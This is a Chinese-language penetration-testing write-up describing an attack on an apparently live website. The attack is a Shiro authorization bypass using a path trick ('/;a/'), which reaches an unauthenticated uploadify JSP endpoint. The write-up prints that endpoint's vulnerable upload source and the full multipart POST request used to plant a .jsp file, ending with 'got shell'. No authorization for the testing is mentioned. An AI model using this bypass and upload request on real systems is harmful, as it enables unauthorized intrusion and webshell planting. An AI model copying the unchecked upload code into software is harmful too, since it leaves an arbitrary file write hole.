0x01 Shiro反序列化命令執行?
日常挖洞,burpsuite插件shiro告警
用ShiroExploit的dnslog方式和靜態文件回顯方式都沒檢測出來。tomcat的回顯也是不行。
0x02 任意文件上傳?
這個站打開是個登錄框
抓包,發現驗證碼無效,爆破一頓以後沒爆出來。注意到
這個框架叫某admin框架,谷歌查了一下這個框架有什麼洞,發現一篇帖子。
說存在此文件plugins/uploadify/uploadFile.jsp 且此文件存在任意文件上傳
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*, java.util.*, org.apache.commons.fileupload.*, java.util.*" %>
<%@ page import="org.apache.commons.fileupload.disk.*, org.apache.commons.fileupload.servlet.*" %>
<%!
public void upload(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException {
String savePath = this.getServletConfig().getServletContext().getRealPath("");
savePath = savePath + request.getParameter("uploadPath");
File f1 = new File(savePath);
//這裏接收了uploadPath的值 System.out.println(request.getParameter("uploadPath"));
if (!f1.exists()) {
f1.mkdirs();
}
DiskFileItemFactory fac = new DiskFileItemFactory();
ServletFileUpload upload = new ServletFileUpload(fac);
upload.setHeaderEncoding("utf-8");
List fileList = null;
try {
fileList = upload.parseRequest(request);
} catch (FileUploadException ex) {
return;
}
String fileNmae = request.getParameter("fileNmae");
Iterator<FileItem> it = fileList.iterator();
String name = "";
String extName = "";
while (it.hasNext()) {
FileItem item = it.next();
if (!item.isFormField()) {
name = item.getName();
long size = item.getSize();
String type = item.getContentType();
//System.out.println(size + " " + type);
if (name == null || name.trim().equals("")) {
continue;
}
// 擴展名格式:
if (name.lastIndexOf(".") >= 0) {
extName = name.substring(name.lastIndexOf("."));
}
File file = null;
if(null != fileNmae && !"".equals(fileNmae)){
file = new File(savePath + fileNmae);
}else{
do {
if(null != fileNmae && !"".equals(fileNmae)){
file = new File(savePath + fileNmae);
}else{
name = new java.text.SimpleDateFormat("yyyyMMddhhmmss").format(new Date()); //獲取當前日期
name = name + (int)(Math.random()*90000+10000);
file = new File(savePath + name + extName);
}
} while (file.exists());
}
File saveFile = new File(savePath + name + extName);
try {
item.write(saveFile);
} catch (Exception e) {
e.printStackTrace();
}
}
}
response.getWriter().print((name.trim() + extName.trim()).trim());
}
%>
<%
upload(request, response);
%>
嘗試訪問此文件,提示未登錄302跳轉
想到這個站用了shiro雖然反序列化命令執行修了,但是最近暴的一個shiro權限繞過肯定來不及修。具體可以看這篇文章:https://mp.weixin.qq.com/s/yb6Tb7zSTKKmBlcNVz0MBA
我們使用
/;a/plugins/uploadify/uploadFile.jsp
來繞過shiro的權限控制,可以注意到狀態碼爲200
結合之前給出的代碼需要兩個參數構造上傳包
發現上傳成功,但是居然找不到文件。
仔細看了一下才知道request.getParameter("uploadPath");解析不了multipart裏的參數,再次構造上傳包
POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQDeBiVqfe6p3FMnJ
------WebKitFormBoundaryQDeBiVqfe6p3FMnJ
Content-Disposition: form-data; name="imgFile"; filename="2204249.jsp"
Content-Type: image/jpeg
test
------WebKitFormBoundaryQDeBiVqfe6p3FMnJ--
成功shell